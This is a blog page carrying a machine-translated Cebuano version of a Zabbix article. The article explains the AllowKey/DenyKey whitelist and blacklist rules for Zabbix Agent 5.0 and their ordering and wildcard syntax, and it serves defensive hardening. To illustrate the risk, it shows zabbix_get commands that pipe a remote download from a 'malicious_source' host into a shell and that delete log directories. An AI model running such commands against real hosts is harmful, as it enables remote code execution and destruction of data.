ProHoster > Π‘Π»ΠΎΠ³ > Pagdumala > Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Suporta sa blacklist ug whitelist alang sa metrics nga bahin sa ahente

Tikhon Uskov, Integration Engineer, Zabbix

Mga isyu sa seguridad sa datos

Ang Zabbix 5.0 adunay bag-ong bahin nga nagtugot kanimo sa pagpalambo sa seguridad sa mga sistema gamit ang Zabbix Agent ug gipulihan ang daan nga parameter EnableRemoteCommands.

Ang mga pag-uswag sa seguridad sa mga sistema nga nakabase sa ahente naggikan sa kamatuoran nga ang usa ka ahente makahimo sa daghang mga potensyal nga peligro nga mga aksyon.

  • Mahimong mangolekta ang ahente sa halos bisan unsang impormasyon, lakip ang kompidensyal o posibleng peligrosong impormasyon, gikan sa mga file sa pag-configure, mga file sa log, mga file sa password, o bisan unsang ubang mga file.

Pananglitan, gamit ang zabbix_get utility mahimo nimong ma-access ang usa ka lista sa mga tiggamit, ilang mga direktoryo sa balay, mga file sa password, ug uban pa.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Pag-access sa datos gamit ang zabbix_get utility

PAHINUMDOM. Makuha ra ang datos kung ang ahente nakabasa sa mga permiso sa katugbang nga file. Apan, pananglitan, ang file /etc/passwd/ mabasa sa tanang tiggamit.

  • Ang ahente mahimo usab nga mopatuman sa posibleng peligrosong mga sugo. Pananglitan, yawe *system.run[]** nagtugot kanimo sa pagpatuman sa bisan unsang hilit nga mga sugo sa mga node sa network, lakip ang pagpadagan sa mga script gikan sa web interface sa Zabbix nga nagpatuman usab sa mga sugo sa bahin sa ahente. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Sa Linux, ang ahente nagdagan pinaagi sa default nga wala’y mga pribilehiyo sa gamut, samtang sa Windows nagdagan kini ingon usa ka serbisyo ingon System ug adunay walay pugong nga pag-access sa file system. Tungod niini, kung walay mga pagbag-o nga gihimo sa mga parametro sa Zabbix Agent pagkahuman sa pag-install, ang ahente adunay access sa registry, file system ug mahimo’g ipatuman ang mga pangutana sa WMI.

Sa naunang mga bersyon ang parameter EnableRemoteCommands=0 gitugotan lamang sa pag-disable sa mga sukatan gamit ang yawe *system.run[]** ug nagdagan nga mga script gikan sa web interface, apan walay paagi sa pagpugong sa pag-access sa indibidwal nga mga file, pagtugot o pag-disable sa indibidwal nga mga yawe nga gi-install uban sa ahente, o limitahan ang paggamit sa indibidwal nga mga parameter.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Gamit ang EnableRemoteCommand parameter sa naunang mga bersyon sa Zabbix

AllowKey/DenyKey

Ang Zabbix 5.0 nagtabang sa pagpanalipod batok sa ingon nga dili awtorisado nga pag-access pinaagi sa paghatag mga whitelist ug blacklist alang sa pagtugot ug pagdumili sa mga sukatan sa bahin sa ahente.

Sa Zabbix 5.0 ang tanan nga yawe, lakip ang *system.run[]** gi-enable, ug duha ka bag-ong opsyon sa pag-configure sa ahente ang gidugang:

AllowKey= - gitugotan nga mga tseke;

DenyKey= - gidili nga mga tseke;

diin ang usa ka yawe nga sumbanan sa ngalan nga adunay mga parametro nga naggamit mga metacharacter (*).

Ang AllowKey ug DenyKey nga mga yawe nagtugot kanimo sa pagtugot o pagdumili sa indibidwal nga mga sukatan base sa usa ka piho nga sumbanan. Dili sama sa ubang mga parameter sa pag-configure, ang gidaghanon sa mga parameter sa AllowKey/DenyKey dili limitado. Gitugotan ka niini nga tin-aw nga mahibal-an kung unsa gyud ang mahimo sa ahente sa sistema pinaagi sa paghimo sa usa ka punoan sa mga tseke - mga executable nga yawe, diin ang pagkasunud kung diin kini gisulat adunay hinungdanon nga papel.

Pagkasunodsunod sa mga lagda

Ang mga lagda gisusi sa han-ay diin sila gisulod sa configuration file. Ang yawe gisusi sumala sa mga lagda sa wala pa ang unang duwa, ug sa diha nga ang yawe sa elemento sa data motakdo sa sumbanan, kini gitugotan o gibalibaran. Pagkahuman niini, ang pagsusi sa lagda mohunong ug ang nahabilin nga mga yawe wala panumbalinga.

Busa, kung ang usa ka elemento motakdo sa pagtugot ug usa ka pagdumili nga lagda, ang resulta magdepende kung unsang lagda ang una sa configuration file.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

2 lainlaing mga lagda nga adunay parehas nga sumbanan ug usa ka yawe vfs.file.size[/tmp/file]

Ang han-ay sa paggamit sa AllowKey/DenyKey nga mga yawe:

  1. eksakto nga mga lagda,
  2. kinatibuk-ang mga lagda,
  3. gidili nga lagda.

Pananglitan, kung kinahanglan nimo ang pag-access sa mga file sa usa ka piho nga folder, kinahanglan nimo una nga tugutan ang pag-access sa kanila, ug dayon ipanghimakak ang tanan nga wala maapil sa natukod nga mga pagtugot. Kung gigamit una ang lagda sa pagdumili, ang pag-access sa folder idili.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Sakto nga pagkasunodsunod

Kung kinahanglan nimo tugutan ang 2 nga mga utilities nga modagan pinaagi sa *system.run[]**, ug ang pagdumili sa lagda una nga itakda, ang mga utilities dili ilunsad, tungod kay ang una nga sumbanan kanunay nga motakdo sa bisan unsang yawe, ug ang sunod nga mga lagda dili tagdon.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Sayop nga pagkasunodsunod

Mga sumbanan

Mga batakang lagda

Ang pattern usa ka ekspresyon nga adunay mga wildcard. Ang metacharacter (*) motakdo sa bisan unsang gidaghanon sa bisan unsang karakter sa usa ka piho nga posisyon. Ang mga metacharacter mahimong magamit sa yawe nga ngalan ug sa mga parameter. Pananglitan, mahimo nimong higpit nga ipasabut ang una nga parameter nga adunay teksto, ug ipiho ang sunod isip wildcard.

Ang mga parameter kinahanglang isulod sa square bracket [].

  • system.run[* - sayop
  • vfs.file*.txt] - sayop
  • vfs.file.*[*] - husto

Mga pananglitan sa paggamit sa wildcard.

  1. Sa yawe nga ngalan ug sa parameter. Sa kini nga kaso, ang yawe dili katumbas sa parehas nga yawe nga wala’y sulud nga parameter, tungod kay sa sumbanan gipakita namon nga gusto namon makadawat usa ka piho nga pagtapos sa yawe nga ngalan ug usa ka piho nga hugpong sa mga parameter.
  2. Kung ang pattern wala mogamit mga square bracket, ang pattern nagtugot sa tanan nga mga yawe nga wala’y mga parameter ug gilimud ang tanan nga mga yawe nga adunay gitakda nga parameter.
  3. Kung ang yawe gisulat sa bug-os ug ang mga parameter gipiho isip wildcard, kini motakdo sa bisan unsang susama nga yawe sa bisan unsang mga parameter ug dili motakdo sa yawe nga walay square bracket, i.e. kini tugutan o dili.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Mga lagda alang sa pagpuno sa mga parameter.

  • Kung ang usa ka yawe nga adunay mga parameter gituyo nga gamiton, ang mga parameter kinahanglan nga itakda sa configuration file. Ang mga parametro kinahanglang ipiho isip usa ka metacharacter. Kinahanglan nga mainampingon nga ipanghimakak ang pag-access sa bisan unsang file ug tagdon kung unsang impormasyon ang mahatag sa sukatan sa ilawom sa lainlaing mga spelling - adunay ug wala’y mga parameter.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Mga bahin sa pagsulat sa mga yawe nga adunay mga parameter

  • Kung ang usa ka yawe gitakda nga adunay mga parameter, apan ang mga parameter kay opsyonal ug gipiho isip usa ka metacharacter, usa ka yawe nga walay mga parameter ang masulbad. Pananglitan, kung gusto nimong i-disable ang pagdawat sa impormasyon bahin sa load sa CPU ug ipiho nga ang system.cpu.load[*] nga yawe kinahanglan nga ma-disable, ayaw kalimti nga ang yawe nga walay mga parameter magbalik sa kasagaran nga kantidad sa pagkarga.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Mga lagda alang sa pagpuno sa mga parameter

Mubo nga mga sulat

kausaban

  • Ang ubang mga lagda dili mausab sa tiggamit, pananglitan, mga lagda sa pagdiskobre o mga lagda sa auto-registration sa ahente. Ang AllowKey/DenyKey nga mga lagda dili makaapekto sa mosunod nga mga parameter:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

PAHINUMDOM. Kung ang usa ka administrador nagpugong sa usa ka yawe, kung gipangutana, ang Zabbix wala maghatag kasayuran kung ngano nga ang metric o yawe nahulog sa ' kategoryaDILI GINASUPORTA'. Ang impormasyon bahin sa mga pagdili sa pagpatuman sa hilit nga mga sugo wala usab gipakita sa mga file sa log sa ahente. Kini alang sa mga hinungdan sa seguridad, apan mahimong makapakomplikado sa pag-debug kung ang mga sukatan mahulog sa usa ka dili suportado nga kategorya sa pipila ka hinungdan.

  • Kinahanglang dili ka magsalig sa bisan unsang espesipikong han-ay alang sa pagkonektar sa mga external configuration file (pananglitan, sa alphabetical order).

Mga Utility sa Command Line

Pagkahuman sa pag-set up sa mga lagda, kinahanglan nimo nga sigurohon nga ang tanan na-configure sa husto.

Mahimo nimong gamiton ang usa sa tulo nga mga kapilian:

  • Pagdugang ug metric sa Zabbix.
  • Pagsulay sa zabbix_agentd. Ang ahente sa Zabbix nga adunay kapilian -print (-p) nagpakita sa tanan nga mga yawe (nga gitugotan sa default) gawas sa mga dili gitugotan sa pag-configure. Ug uban sa kapilian -pagsulay (-t) kay ang usa ka gidili nga yawe mobalik 'Dili suportado nga yawe sa butang'.
  • Pagsulay sa zabbix_get. Utility zabbix_get nga adunay kapilian -k mobalik'ZBX_NOTSUPPORTED: Wala mailhi nga sukatan'.

Tugoti o ilimod

Mahimo nimong ipanghimakak ang pag-access sa usa ka file ug i-verify, pananglitan, gamit ang utility zabbix_getnga ang pag-access sa file gibalibaran.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

**

PAHINUMDOM. Gibaliwala ang mga kinutlo sa parameter.

Sa kini nga kaso, ang pag-access sa ingon nga file mahimong tugutan pinaagi sa lahi nga agianan. Pananglitan, kung ang usa ka symlink modala niini.

Suporta sa blacklist ug whitelist alang sa mga sukatan sa bahin sa ahente sa Zabbix 5.0

Girekomenda nga susihon ang lainlaing mga kapilian alang sa pag-aplay sa gitakda nga mga lagda, ug tagda usab ang mga posibilidad sa paglikay sa mga pagdili.

Mga Pangutana ug mga Tubag

ang pangutana. Ngano nga ang ingon ka komplikado nga sumbanan nga adunay kaugalingon nga sinultian gipili aron ihulagway ang mga lagda, pagtugot ug pagdili? Ngano nga dili posible nga gamiton, pananglitan, ang regular nga mga ekspresyon nga gigamit ni Zabbix?

Tubag. Kini usa ka isyu sa pasundayag sa regex tungod kay kasagaran usa ra ka ahente ug gisusi niini ang daghang mga sukatan. Ang Regex usa ka bug-at nga operasyon ug dili namon masusi ang libu-libo nga mga sukatan niini nga paagi. Wildcards - usa ka unibersal, kaylap nga gigamit ug yano nga solusyon.

ang pangutana. Dili ba ang Ilakip ang mga file gilakip sa han-ay sa alpabeto?

Tubag. Sa akong nahibal-an, halos imposible nga matagna ang han-ay kung diin ang mga lagda magamit kung imong ipakaylap ang mga lagda sa lainlaing mga file. Girekomenda nako ang pagkolekta sa tanan nga mga lagda sa AllowKey/DenyKey sa usa nga Ilakip ang file, tungod kay sila nakig-uban sa usag usa, ug lakip na kini nga file..

ang pangutana. Sa Zabbix 5.0 ang kapilian 'EnableRemoteCommands=' wala sa configuration file, ug AllowKey/DenyKey lang ang anaa?

Tubag. Oo nga tama.

Бпасибо за вниманиС!

Source: www.habr.com

Idugang sa usa ka comment